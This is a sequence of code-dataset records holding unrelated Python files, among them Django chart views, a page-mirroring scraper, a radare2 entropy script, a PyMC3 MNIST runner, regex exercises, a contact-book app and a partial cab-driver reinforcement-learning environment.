None\n\t\t\t\n\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': title,\n\t\t'subtitle': '',\n\t\t'yaxis':yaxis\n\t\t}, context_instance=RequestContext(request))\n\n\ndef timeseries_mortality(request,variable='num_deaths'):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\ttitle=yaxis=None\n\tif request.method == 'POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\t\t\tif (len(states_id)>0):\n\t\t\t\t# Aggregate by state and year\n\t\t\t\tif variable in ('num_deaths','crude_rate'):\n\t\t\t\t\tdata = MortalityByStateYearly.objects.filter(state__id__in= states_id).values('state','year').select_related('state__name').annotate(value=Sum(variable))\n\t\t\t\t\tif variable=='num_deaths':\n\t\t\t\t\t\tdata = data.filter(num_deaths__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Number of Deaths (yearly)'\n\t\t\t\t\t\tyaxis='Deaths'\n\t\t\t\t\telif variable=='crude_rate':\n\t\t\t\t\t\tdata = data.filter(crude_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\ttitle = 'Crude rate (yearly)'\n\t\t\t\t\t\tyaxis='Crude rate (per 1000)'\n\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\traise Http404\n\t\t\telse:\n\t\t\t\tdata = None\n\t\t\t\n\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': title,\n\t\t'subtitle': '',\n\t\t'yaxis':yaxis\n\t\t}, context_instance=RequestContext(request))\n\ndef association_mortality(request):\n\tstate=None\n\tdata = None\n\tform = UsStateSelectForm()\n\ttitle=yaxis=None\n\tif request.method=='POST':\n\t\tform = UsStateSelectForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tstates = 
form.cleaned_data['name']\n\t\t\tstates_id = [ int(state.id) for state in states ]\n\t\t\tif (len(states_id)>0):\n\t\t\t\tdata = MortalityByStateYearly.objects.filter(state__id__in= states_id).values('state','year').select_related('state__name').annotate(value=Sum(variable))\t\n\t\t\t\tdata = data.filter(crude_rate__isnull=False ).order_by('state','year').values('state','state__name','year','value')\n\t\t\t\t\t\t\n\treturn render_to_response('visualization/linechart.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'state': state,\n\t\t'title': title,\n\t\t'subtitle': '',\n\t\t'yaxis':yaxis\n\t\t}, context_instance=RequestContext(request))\n\ndef kmeans_test(request):\n\tdata = None\n\tform = kmeansNumSamplesForm()\n\tk=None\n\tsample_size=None\n\tgrouped_data = None\n\tclusters = None\n\terror_list = None\n\tif request.method=='POST':\n\t\tform = kmeansNumSamplesForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tsample_size = int(form.cleaned_data['num_samples'])\n\t\t\tk = int(form.cleaned_data['k'])\n\t\t\t# Generate random data\n\t\t\tdata = numpy.random.random((sample_size, 2)) \n\t\t\t# Calculate kmeans\n\t\t\tif form.cleaned_data['method']=='Basic':\n\t\t\t\tgrouped_data, clusters, error_list = kmeans.kmeans(data,num_clusters=k, min_error=0.01, max_iter=100)\n\t\t\telse:\n\t\t\t\tgrouped_data, clusters, error_list = kmeans.bisecting_kmeans(data,k=k, min_error=0.01, max_iter=50)\n\treturn render_to_response('visualization/kmeans.html', {\n\t\t'data': grouped_data,\n\t\t'clusters': clusters,\n\t\t'error_list': error_list,\n\t\t'form':form,\n\t\t'k': k,\n\t\t'sample_size': sample_size,\n\t\t}, context_instance=RequestContext(request))\n#Return the year choices using minimum and maximum year from a model containing field year and state.\ndef get_year_choices(queryset,variable):\n\tnull_filter = {variable+'__isnull':False}\n\tmax_year = queryset.filter(**null_filter).aggregate(Max('year'))\n\tmin_year = queryset.filter(**null_filter).aggregate(Min('year'))\n\tyear_choices= [(i,i) for i in range(int(min_year['year__min']),int(max_year['year__max'])+1)]\n\tyear_choices = tuple(year_choices)\n\treturn year_choices\n\n# Responsible for returning the map for Unemployment, Natality, and Mortality.\ndef map_variable(request, variable,model):\n\tyear_choices = get_year_choices(model.objects,variable)\n\tform = YearlyMapAggregationForm(initial={'method':\"mean\"},year_choices=year_choices)\n\tmin_year = form.getMinYear()\n\tmax_year = form.getMaxYear()\n\tform.fields['starting_year'].initial = min_year\n\tform.fields['ending_year'].initial = max_year\n\tmethod='mean'\n\tlegend=''\n\tif request.method=='POST':\n\t\tform = YearlyMapAggregationForm(request.POST,year_choices=year_choices)\n\t\tif form.is_valid():\n\t\t\tif form.cleaned_data[\"starting_year\"]!='':\n\t\t\t\tmin_year = form.cleaned_data[\"starting_year\"]\n\t\t\tif form.cleaned_data[\"ending_year\"]!='': \n\t\t\t\tmax_year = form.cleaned_data[\"ending_year\"]\n\t\t\tmethod = form.cleaned_data[\"aggregation_method\"]\n\t\telse:\n\t\t\treturn render_to_response('visualization/map.html', {\n\t\t\t\t'data': None,\n\t\t\t\t'form':form,\n\t\t\t\t'title':\"Please check form errors\",\n\t\t\t\t}, context_instance=RequestContext(request))\n\t\t\n\tdata = model.objects.filter(year__gte=min_year,year__lte=max_year)\n\t# Remove null values from the query (happens in natality and mortality in birth rate and fertility rate)\n\t# Set title and legend upon variable to be plotted\n\tif variable == 'value':\n\t\tlegend=\"%\"\n\t\ttitle = \"Unemployed 
population (Yearly) [\"+method+\"]\"\n\t\tdataset='unemployment'\n\telif variable == 'num_births':\n\t\tdata = data.filter(num_births__isnull=False)\n\t\ttitle = \"Number of births (Yearly) [\"+method+\"]\"\n\t\tlegend='births'\n\t\tdataset='natality'\n\telif variable == 'birth_rate':\n\t\tdata = data.filter(birth_rate__isnull=False)\n\t\ttitle = \"Birth rate (Yearly) [\"+method+\"]\"\n\t\tlegend=' per 1000'\n\t\tdataset='natality'\n\telif variable == 'fertility_rate':\n\t\tdata = data.filter(fertility_rate__isnull=False)\n\t\ttitle = \"Fertility rate (Yearly) [\"+method+\"]\"\n\t\tlegend = \"per 1000\"\n\t\tdataset='natality'\n\telif variable == 'num_deaths':\n\t\tdata = data.filter(num_deaths__isnull=False)\n\t\ttitle = \"Deaths in the US (Yearly) [\"+method+\"]\"\n\t\tlegend = \"per 1000\"\n\t\tdataset='mortality'\n\telif variable == 'crude_rate':\n\t\tdata = data.filter(crude_rate__isnull=False)\n\t\ttitle = \"Crude rate (Yearly) [\"+method+\"]\"\n\t\tlegend = \"per 1000\"\n\t\tdataset='mortality'\n\telse:\n\t\traise Http404\n\tdata = data.select_related('state__code').values('state','state__code')\n\n\tif method=='mean':\n\t\tdata=data.annotate(value=Avg(variable))\n\telif method==\"min\":\n\t\tdata=data.annotate(value=Min(variable))\n\telif method==\"max\":\n\t\tdata=data.annotate(value=Max(variable))\n\telif method==\"sum\":\n\t\tdata=data.annotate(value=Sum(variable))\n\telse:\n\t\traise Http404\n\n\t# Get min and max value for display in highcharts\n\tmin_val = data.aggregate(Min('value'))['value__min']\n\tmax_val = data.aggregate(Max('value'))['value__max']\n\treturn render_to_response('visualization/map.html', {\n\t\t'data': data,\n\t\t'form':form,\n\t\t'title':title,\n\t\t'legend':legend,\n\t\t'min_val':min_val,\n\t\t'max_val':max_val,\n\t\t'dataset':dataset,\n\t\t'variable':variable\n\t\t}, context_instance=RequestContext(request))\n\n","sub_path":"visualization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"626243193","text":"import requests\r\nimport os\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nimport time\r\n\r\n\r\nURL='http://h5.eqxiu.com/s/Cpmop6jW'\r\nUSERAGENT='Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/12.0 Mobile/15A372 Safari/604.1'\r\n\r\nSESSION=requests.Session()\r\nSESSION.headers={'User-Agent':USERAGENT}\r\n\r\nprofile = webdriver.FirefoxProfile()\r\nprofile.set_preference(\"general.useragent.override\", USERAGENT)\r\nDRIVER = webdriver.Firefox(firefox_profile=profile,executable_path='./geckodriver')\r\nDRIVER.set_window_size(480, 800)\r\n\r\n\r\n\r\npaths=URL.split('/')\r\n\r\nfor path in paths:\r\n if path !='':\r\n\r\n BASEPATH=path+'/'\r\n\r\ndef mk_dir(dir=''):\r\n try:\r\n os.mkdir(BASEPATH+dir)\r\n except Exception as e:\r\n # print(e)\r\n # print(str(e))\r\n pass\r\n\r\n\r\n\r\nclass Static:\r\n def __init__(self,tag):\r\n self.tag=tag\r\n self.old_tag_str=str(tag)\r\n self.new_tag_str=''\r\n self.url=''\r\n self.filetype=''\r\n self.type=''\r\n self.filename=''\r\n \r\n def save(self,name):\r\n print('-----------------SAVING-----------------')\r\n \r\n tag=self.tag\r\n try:\r\n self.url=tag['href']\r\n except KeyError:\r\n self.url=tag['src']\r\n except Exception as e:\r\n print(str(e))\r\n raise\r\n\r\n if self.url[:4] != 'http':\r\n self.url=URL + self.url\r\n\r\n \r\n try:\r\n r=SESSION.get(self.url)\r\n 
self.type=r.headers['Content-Type'].split('/')[0]\r\n if self.type == 'application':\r\n self.type= 'js'\r\n self.filetype='js'\r\n elif self.type == 'image':\r\n self.type= 'img'\r\n self.filetype=r.headers['Content-Type'].split('/')[1]\r\n elif self.type == 'text':\r\n self.filetype=r.headers['Content-Type'].split('/')[1]\r\n else:\r\n print(self.type)\r\n raise\r\n \r\n self.filename=name+'.'+self.filetype\r\n \r\n print('type:',self.type,'\\nfiletype',self.filetype,'\\nfilename',self.filename)\r\n \r\n mk_dir(self.type)\r\n \r\n with open(BASEPATH+self.type+'/'+self.filename,'wb',) as f:\r\n f.write(r.content)\r\n self.new_tag_str=self.old_tag_str.replace(self.url,self.type+'/'+self.filename)\r\n return True\r\n\r\n except Exception as e:\r\n print('ERROR IN FILE SAVEING')\r\n print(str(e))\r\n return False\r\n\r\n\r\nclass LocalStatic:\r\n def __init__(self,tag):\r\n self.tag=tag\r\n self.old_tag_str=str(tag)\r\n self.new_tag_str=''\r\n self.code=''\r\n self.type=''\r\n self.filename=''\r\n \r\n def fix(self,filename):\r\n tag=self.tag\r\n self.code=tag.text\r\n if tag.name=='script':\r\n self.type='js'\r\n elif tag.name=='style':\r\n self.type='css'\r\n else :\r\n print('UNKNOW INSTATIC TYPE')\r\n \r\n self.filename=filename+'.'+self.type\r\n\r\n # 创建类型路径\r\n mk_dir(self.type)\r\n \r\n\r\n def save(self):\r\n print('-----------------SAVING-----------------')\r\n try:\r\n print('type:',self.type,'\\nfilename',self.filename)\r\n # 保存文件\r\n with open(BASEPATH+self.type+'/'+self.filename,'w',) as f:\r\n f.write(self.code)\r\n # 将url指向文件\r\n if self.type == 'js':\r\n self.new_tag_str=''\r\n elif self.type == 'css':\r\n self.new_tag_str=''\r\n else:\r\n print('UNKNOW INSTATIC TYPE')\r\n\r\n return True\r\n\r\n except Exception as e:\r\n print(str(e))\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n # print(BASEPATH)\r\n \r\n mk_dir()\r\n\r\n # r=SESSION.get(URL)\r\n # encode=r.apparent_encoding\r\n # # print(r.apparent_encoding)\r\n # r.encoding=encode\r\n # html=r.text\r\n\r\n DRIVER.get(URL)\r\n \r\n time.sleep(30)\r\n html=DRIVER.page_source\r\n DRIVER.quit()\r\n\r\n soup=BeautifulSoup(html,'html.parser')\r\n\r\n with open(BASEPATH + 'page_source_old.html','w',encoding='utf8') as f:\r\n f.write(str(soup))\r\n\r\n new_page_source=str(soup)\r\n\r\n # 获取文件标签\r\n tele_tags=[]\r\n local_tages=[]\r\n local_tages.extend( soup.find_all('style'))\r\n tele_tags.extend( soup.find_all('link'))\r\n tele_tags.extend( soup.find_all('img'))\r\n \r\n for tag in soup.find_all('script'):\r\n try:\r\n print(tag['src'])\r\n tele_tags.append(tag)\r\n except KeyError:\r\n tag.text\r\n local_tages.append(tag)\r\n except Exception as e:\r\n print('UNKNOW SCRIPT TYPE')\r\n print(str(e))\r\n raise\r\n \r\n\r\n # 操作远程文件\r\n n=0\r\n for tag in tele_tags:\r\n static=Static(tag)\r\n if static.save(str(n)):\r\n new_page_source=new_page_source.replace(static.old_tag_str,static.new_tag_str)\r\n n+=1\r\n \r\n # 操作本地文件\r\n for tag in local_tages:\r\n local_static=LocalStatic(tag)\r\n local_static.fix(str(n))\r\n if local_static.save():\r\n new_page_source=new_page_source.replace(local_static.old_tag_str,local_static.new_tag_str)\r\n n+=1\r\n\r\n # 插入控制脚本\r\n basejs='\\n\\n'\r\n new_page_source = new_page_source.replace('',basejs+'')\r\n addonjs='''\r\n \\n\r\n
    \r\n        Default WeChat ID\r\n        Default WeChat customer service name\r\n        Default gender\r\n    \r\n    
\r\n \\n\r\n '''\r\n new_page_source = new_page_source.replace('',addonjs+'')\r\n\r\n # SAVE\r\n with open(BASEPATH+ 'page_source_new.html','w',encoding='utf8') as f:\r\n f.write(new_page_source)","sub_path":"go.py","file_name":"go.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"312171389","text":"from sqlalchemy import create_engine, select\nfrom models import Base\n\nengine_lite = create_engine('sqlite:///mydb.sqlite')\nengine_cloud = create_engine('postgresql+psycopg2://USER:PW@/DBNAME?host=/cloudsql/INSTANCE')\n\nwith engine_lite.connect() as conn_lite:\n with engine_cloud.connect() as conn_cloud:\n for table in Base.metadata.sorted_tables:\n data = [dict(row) for row in conn_lite.execute(select(table.c))]\n conn_cloud.execute(table.insert().values(data))","sub_path":"week-010/importdb.py","file_name":"importdb.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"596906210","text":"from atomthemes.celery import celery_app\nimport logging\n\nfrom .readme import ReadmeReader\nfrom .models import Theme\n\nlogger = logging.getLogger(__name__)\n\n\n@celery_app.task\ndef discover_page(page):\n count = 0\n allowed_types = set(['syntax', 'ui'])\n for package_data in page.get_items():\n meta = package_data['metadata']\n theme_type = meta.get('theme')\n if theme_type and theme_type in allowed_types:\n logger.info('Found theme: ' + package_data['name'])\n theme_factory = ThemeFactory(package_data)\n theme_factory.save_to_db()\n count += 1\n return count\n\n\nclass ThemeFactory:\n def __init__(self, package_data):\n self.package_data = package_data\n\n def save_to_db(self):\n theme, created = Theme.objects.get_or_create(name=self.package_data['name'])\n current_version = self.package_data['releases']['latest']\n theme.stars = self.package_data['stargazers_count']\n theme.downloads = self.package_data['downloads']\n\n if created:\n theme.repository_url = self.package_data['repository']['url']\n theme.theme = self.package_data['metadata']['theme']\n\n if created or current_version != theme.version:\n theme.screenshot = self.extract_screenshot()\n theme.version = current_version\n\n theme.save()\n return theme\n\n def extract_screenshot(self):\n readme = ReadmeReader(self.package_data['readme'])\n return readme.get_screenshot()\n","sub_path":"atomthemes/packages/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"540120626","text":"import sys\nimport r2pipe\n\nif len(sys.argv) < 2 :\n print(\"Provide file path and optional block size!\")\n sys.exit()\n\nvisual = [\" \", \"+\", \"++\", \"+++\", \"++++\", \"+++++\", \"++++++\",\\\n \"+++++++\", \"++++++++\", \"+++++++++\", \"++++++++++\"]\n\nr2 = r2pipe.open(sys.argv[1])\nsize = int(r2.cmd('iZ'))\n\nblock_size = int(sys.argv[2], 16) if (len(sys.argv) > 2) else 0x0\n \nif (block_size > size) or (block_size == 0x0) :\n block_size = size\n\nnum_blocks = size // block_size\n\nr2.cmd('b '+ str(block_size))\nfor _ in range(num_blocks) :\n ent = r2.cmd('ph entropy')\n print(r2.cmd('s').replace(\"\\n\", \"\"))\n print(visual[int(float(ent))])\n print(ent)\n 
r2.cmd('s++')\n\n","sub_path":"scripts/print_entropy.py","file_name":"print_entropy.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"617584429","text":"\"\"\"\nRun multiple models on the Mnist data.\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport json\n\nimport numpy as np\nimport pymc3 as pm\n\nimport models\nimport data\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_pred_clusters(model, samples, njobs):\n with model:\n trace = pm.sample(samples, njobs=njobs)\n pred_clusters = [np.argmax(np.bincount(zi)) for zi in trace['z'].T]\n return np.array(pred_clusters, int)\n\n\ndef save_config(config, exp_name):\n filename = os.path.expanduser(\"~/plot/mnist_{}_config.json\".format(\n exp_name))\n with open(filename, 'w') as fwrite:\n json.dump(config, fwrite)\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n parser = argparse.ArgumentParser()\n # data\n parser.add_argument('--n-classes', type=int, default=10)\n parser.add_argument('--feat-std-min', type=float, default=0.1)\n # model\n parser.add_argument('--model-names', type=str, nargs='+')\n parser.add_argument('--n-comp', type=int, default=10)\n parser.add_argument('--n-trunc', type=int, default=30)\n parser.add_argument('--dp-alpha', type=float, default=1)\n parser.add_argument('--pcomp-dirichlet-dist-alpha', type=float, default=1)\n parser.add_argument('--pkw-beta-dist-alpha', type=float, default=1)\n parser.add_argument('--pkw-beta-dist-beta', type=float, default=1)\n parser.add_argument('--pkw-dirichlet-dist-alpha', type=float, default=1)\n # trace\n parser.add_argument('--samples', type=int, default=500)\n parser.add_argument('--njobs', type=int, default=1)\n # other\n parser.add_argument('--exp-name', type=str, default='A')\n args = parser.parse_args()\n logger.info(\"args=%s\", args)\n\n save_config(vars(args), args.exp_name)\n dataset = data.Mnist(args.n_classes, args.feat_std_min)\n for model_name, model in models.get_models(\n dataset.X_count, dataset.X_bin, vars(args)).items():\n if args.model_names is None or model_name in args.model_names:\n exp_name = \"{}_{}\".format(args.exp_name, model_name)\n pred_clusters = get_pred_clusters(model, args.samples, args.njobs)\n dataset.evaluate_clusters(pred_clusters, exp_name)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_mnist.py","file_name":"run_mnist.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"43913994","text":"import re\npattern1=\"y\"\nstring1 = \"http://yum.iqianyue.com\"\nresult1=re.match(pattern1, string1)\nresult11=re.search(pattern1, 
string1)\nprint(\"result1:\"+str(result1))\nprint(\"result11:\"+str(result11))\n\npattern2=\"\\n\"\nstring2='''http://yum.iqianyue.comhttp://baidu.com'''\nresult2=re.search(pattern2,string2)\nprint(result2)\n\npattern3='\\w\\dpython(\\w)'\nstring3='abcd3pythone'\nresult3=re.search(pattern3,string3)\nresult33=re.compile(pattern3).findall(string3)\nprint(result3)\nprint(result33)\n\npattern4=\"\\w\\dpython[xyz]\\w\"\npattern5=\"\\w\\dpython[^xyz]\\w\"\npattern6=\"\\w\\dpython[xyz]\\W\"\nstring4=\"abcdfphp345pythony_py\"\nresult4=re.search(pattern4,string4)\nresult5=re.search(pattern5,string4)\nresult6=re.search(pattern6,string4)\nprint(result4)\nprint(result5)\nprint(result6)\n\npattern7=\".python...\"\nstring7=\"abcdefgphp345pythony_py\"\nresult7=re.search(pattern7,string7)\nprint(result7)\n\nstring8=\"hellomypythonhispythonourpythonend\"\npattern8=re.compile(\".python.\")\nresult8=pattern8.findall(string8)\nprint(result8)\n\nstring9=\"hellomypythonhispythonourpythonend\"\npattern9=\"python.\"\nresult9=re.sub(pattern9,\"php\",string9)\nprint(result9)\n\nstring9=\"hellomypythonhispythonourpythonend\"\npattern9=\"python.\"\nresult9=re.sub(pattern9,\"php\",string9,2)\nprint(result9)\n\npattern10=\"[a-zA-Z]+://[^\\s]*[.com|.cn]\"\nstring10=\" baidu \"\nresult10=re.search(pattern10,string10)\nprint(result10)\n\npattern11=\"\\d{4}-\\d{7}|\\d{3}-\\d{8}\"\nstring11=\"021-382933568888sad\"\nresult11=re.search(pattern11,string11)\nprint(result11)\n\n\n\n\n","sub_path":"正则.py","file_name":"正则.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"515607024","text":"import sys\nimport time\n\nclass counter:\n def __init__(self, count, delay):\n self.Count = count\n self.Form = '%' + str(len(list(str(count))) + 2) + 's/'\n self.Num = int()\n self.LastTellTime = float()\n self.Now = float()\n self.Delay = float(delay)\n self.CountStepDelay = int()\n self.AllSpeed = list()\n self.AverageSpeed = float()\n \n def tell(self, text):\n string = self.Form % self.Num + str(self.Count) + ' ' + text + ' (' + self.averageSpeed() + ') [' + self.timeLeft() + '] '\n sys.stdout.write(string)\n sys.stdout.flush()\n sys.stdout.write('\\b' * len(string))\n #print(self.Num + '/' + str(self.Count) + ' ' + text, end=\"\")\n \n def step(self, text):\n self.Num += 1\n self.Now = time.time()\n if self.Now - self.LastTellTime < self.Delay:\n self.CountStepDelay += 1\n else:\n self.tell(text)\n self.LastTellTime = time.time()\n self.CountStepDelay = 0\n \n def lastTell(self, text):\n #self.LastTellTime = float()\n self.tell(text)\n print()\n\n def averageSpeed(self):\n if self.CountStepDelay > 0:\n try:\n value = float(self.CountStepDelay) / (self.Now - self.LastTellTime)\n except ZeroDivisionError:\n value = 666.0\n self.AllSpeed.append(value)\n self.AverageSpeed = sum(self.AllSpeed) / len(self.AllSpeed)\n \n return str(round(self.AverageSpeed, 1)) + '/sec'\n \n def timeLeft(self):\n count = self.Count - self.Num\n if count != 0 and self.AverageSpeed != 0:\n return time.strftime('%X', time.gmtime(count / self.AverageSpeed))\n elif count == 0 and self.AverageSpeed != 0:\n return time.strftime('%X', time.gmtime(self.Count / self.AverageSpeed))\n else:\n return '0'\n\n\n## Тестирование (при импорте не отрабатывает)\nif __name__ == \"__main__\":\n a = [1,2,3]\n counter = counter(len(a), 0.5)\n b = time.time()\n counter.step('Hello')\n time.sleep(0.9)\n counter.step('Hello')\n time.sleep(2)\n counter.step('Hello')\n time.sleep(2)\n 
counter.lastTell('Bye')\n print(time.time() - b)","sub_path":"modules/Counter.py","file_name":"Counter.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"615973667","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.admin import UserAdmin\nfrom .models import *\n\n# Register your models here.\nfrom django.conf import settings\n\n#\n# class AbstractUserAdmin(BaseUserAdmin):\n# form = RegisterForm\n# add_form = RegisterForm\n# list_display = ('username', 'firstname', 'lastname', 'email', 'birth', 'gender', 'password',)\n# fieldsets = (\n# (None, {'fields': ('username', 'email', 'password', 'firstname', 'lastname', 'birth', 'gender', )}),\n# ('Personal info', {'fields': ()}),\n# )\n# list_filter = ('username',)\n# add_fieldsets = (\n# (None, {\n# 'classes': ('wide',),\n# 'fields': ('username', 'firstname', 'lastname', 'birth', 'email', 'gender', 'password1', 'password2')}\n# ),\n# )\n# filter_horizontal = ()\n# ordering = ('username', 'email', )\n\nclass ProfileInline(admin.StackedInline):\n model = Profile\n can_delete = False\n verbose_name_plural = 'web_users'\n\nclass CustomUserAdmin(UserAdmin):\n inlines = (ProfileInline,)\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, CustomUserAdmin)\nadmin.site.register(Place)\nadmin.site.register(Activity)\nadmin.site.register(Expense)\nadmin.site.register(TravelGroup)\nadmin.site.register(Friendship)\nadmin.site.register(Message)\nadmin.site.register(Notification)\n# admin.site.register(AbstractUser, AbstractUserAdmin)\n","sub_path":"restful_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"244623973","text":"import sqlite3\r\nbase = sqlite3.connect(\"contact_book.db\")\r\ncur = base.cursor()\r\ncur.execute(\"CREATE TABLE IF NOT EXISTS Contact (Name TEXT, Number TEXT)\")\r\n\r\nwhile True:\r\n print(\"Choose An Option- \")\r\n print(\"1/ Add Contact\")\r\n print(\"2/ Remove Contact\")\r\n print(\"3/ Edit Contact\")\r\n print(\"4/ See all contacts\")\r\n print(\"5/ Search contact\")\r\n print(\"6/ Exit\")\r\n ask = int(input(\"Input: \"))\r\n\r\n #option_1\r\n if ask == 1:\r\n print()\r\n while True:\r\n que_1_of_1 = input(\"Name: \").capitalize()\r\n que_2_of_1 = input(\"Number: \")\r\n cur.execute(\"INSERT INTO Contact (Name, Number) VALUES(?, ?)\", (que_1_of_1, que_2_of_1))\r\n base.commit()\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n if (que_1_of_1, que_2_of_1) in all:\r\n print()\r\n print(\"Operation Successfull\")\r\n print()\r\n else:\r\n print()\r\n print(\"Operation Unsuccessfull\")\r\n print()\r\n print(\"Do you want to add another contact? 
y/n\")\r\n que_3_of_1 = input()\r\n if que_3_of_1 == \"n\":\r\n print()\r\n break\r\n\r\n #option_2\r\n elif ask == 2:\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n while True:\r\n print()\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0])\r\n ii = ii + 1\r\n que1_of_2 = int(input(\"Which contact you want to remove: \"))\r\n element = all[que1_of_2 - 1][1]\r\n cur.execute(\"DELETE FROM Contact WHERE Number = ?\", (element,))\r\n base.commit()\r\n if element not in all:\r\n print()\r\n print(\"Operation Successful\")\r\n else:\r\n print()\r\n print(\"Operation Unsccessful\")\r\n print()\r\n cur.execute(\"SELECT*FROM Contact\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n print(\"Do you want to remove more? y/n\")\r\n que2_of_2 = input()\r\n if que2_of_2 == \"n\":\r\n break\r\n else:\r\n break\r\n else:\r\n print()\r\n print(\"List Empty\")\r\n print()\r\n\r\n #option_3\r\n elif ask == 3:\r\n print()\r\n cur.execute(\"SELECT*FROM Contact ORDER BY NAME ASC\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0])\r\n ii = ii + 1\r\n else:\r\n print(\"The list is empty\")\r\n print()\r\n que_1_of_3 = int(input(\"Which contact you want to edit: \"))\r\n print()\r\n\r\n name = all[que_1_of_3-1][0]\r\n number = all[que_1_of_3-1][1]\r\n\r\n print(\"Name:\", name)\r\n print(\"Number:\", number)\r\n print()\r\n\r\n new_num = (input(\"New Number: \"))\r\n cur.execute(\"UPDATE Contact SET Number = ? WHERE Number = ?\", (new_num, number))\r\n base.commit()\r\n\r\n cur.execute(\"SELECT*FROM Contact ORDER BY NAME ASC\")\r\n all = cur.fetchall()\r\n print()\r\n if (name, new_num) in all:\r\n print(\"Operation Successful\")\r\n else:\r\n print(\"Operation Unsuccessful\")\r\n\r\n #option_4\r\n elif ask == 4:\r\n print()\r\n cur.execute(\"SELECT*FROM Contact ORDER BY NAME ASC\")\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0], '-', i[1])\r\n ii = ii + 1\r\n print(all)\r\n else:\r\n print(\"The list is empty\")\r\n print()\r\n\r\n #option 5\r\n elif ask == 5:\r\n search=input(\"Search: \")\r\n print()\r\n cur.execute(\"SELECT*FROM Contact WHERE NAME LIKE ? ORDER BY NAME\",(search+\"%\",))\r\n all = cur.fetchall()\r\n if len(all) > 0:\r\n ii = 1\r\n for i in all:\r\n print(ii, i[0], '-', i[1])\r\n ii = ii + 1\r\n else:\r\n print(\"The list is empty\")\r\n print()\r\n\r\n #option_6\r\n elif ask == 6:\r\n break\r\n\r\n else:\r\n print(\"please try again\")","sub_path":"contact book.py","file_name":"contact book.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"600096943","text":"# Import routines\n\nimport numpy as np\nimport math\nimport random\nfrom sklearn import preprocessing\n\n# Defining hyperparameters\nm = 5 # number of cities, ranges from 1 ..... m\nt = 24 # number of hours, ranges from 0 .... t-1\nd = 7 # number of days, ranges from 0 ... 
d-1\nC = 5 # Per hour fuel and other costs\nR = 9 # per hour revenue from a passenger\n\n\nclass CabDriver():\n\n def __init__(self):\n \"\"\"initialise your state and define your action space and state space\"\"\"\n self.action_space = tuple([(pick_up,drop) for pick_up in (1,2,3,4,5) for drop in (1,2,3,4,5) if pick_up!=drop])\n self.state_space = [(loc, time, day) for loc in np.arange(1,m+1) for time in range(t) for day in range(d)]\n self.state_init = random.choice(self.state_space)\n self.state_input = (np.arange(1,m+1) , np.arange(0,t) , np.arange(0,d))\n # Start the first round\n self.reset()\n\n\n ## Encoding state (or state-action) for NN input\n\n def state_encod_arch1(self, state):\n \"\"\"convert the state into a vector so that it can be fed to the NN. This method converts a given state into a vector format. Hint: The vector is of size m + t + d.\"\"\"\n\n ohe = preprocessing.OneHotEncoder()\n location_vector = ohe.fit_transform(self.state_input[0].reshape(-1,1)).todense()[:,state[0]-1]\n time_vector = ohe.fit_transform(self.state_input[1].reshape(-1,1)).todense()[:,state[1]]\n day_vector = ohe.fit_transform(self.state_input[2].reshape(-1,1)).todense()[:,state[2]]\n \n state_encod = 